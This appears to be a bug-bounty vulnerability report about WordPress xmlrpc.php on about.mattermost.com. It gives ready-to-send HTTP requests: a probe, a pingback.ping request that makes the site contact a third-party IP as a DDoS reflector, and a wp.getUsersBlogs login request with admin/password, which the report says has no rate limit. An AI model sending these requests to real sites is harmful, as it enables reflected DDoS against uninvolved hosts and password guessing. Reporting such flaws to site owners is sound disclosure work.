Untitled

Wordpress Pingback DDoS Attacks in domain: https://about.mattermost.com/xmlrpc.php
===============================================================

URL: https://about.mattermost.com/xmlrpc.php

Wordpress blogs that have about.mattermost.com/xmlrpc.php enabled for pingbacks, trackbacks, etc. can be made as a part of a huge botnet causing a major DDOS. The blog at about.mattermost.com//xmlrpc.php has the xmlrpc.php file enabled and could thus be potentially used for such an attack against other victim hosts.

In order to determine whether the xmlrpc.php file is enabled or not, using the Repeater tab in Burp, send the request below. See screenshot:

POST /xmlrpc.php HTTP/1.1
Host: about.mattermost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0

<?xml version="1.0" encoding="utf-8"?>
<methodCall>
<methodName>demo.sayHello</methodName>
<params>
<param>
<value>admin</value>
</param>
</params>
</methodCall>

POST /xmlrpc.php HTTP/1.1
Host: about.mattermost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5

<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>https://192.0.79.32/</string></value>
</param>
<param>
<value><string>https://about.mattermost.com/xmlrpc.php</string></value>
</param>
</params>
</methodCall>


PoC:
====
https://imgur.com/a/D8g1I


As soon as the above request is sent, the victim host (192.0.79.32) gets an entry in its log file with a request originating from the about.mattermost.com/xmlrpc.php domain verifying the pingback.

<?xml version="1.0"?>
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param>
<value>
<string>admin</string>
</value>
</param>
<param>
<value>
<string>password</string>
</value>
</param>
</params>
</methodCall>

And also no rate limit to check username/password

Thanks

_Root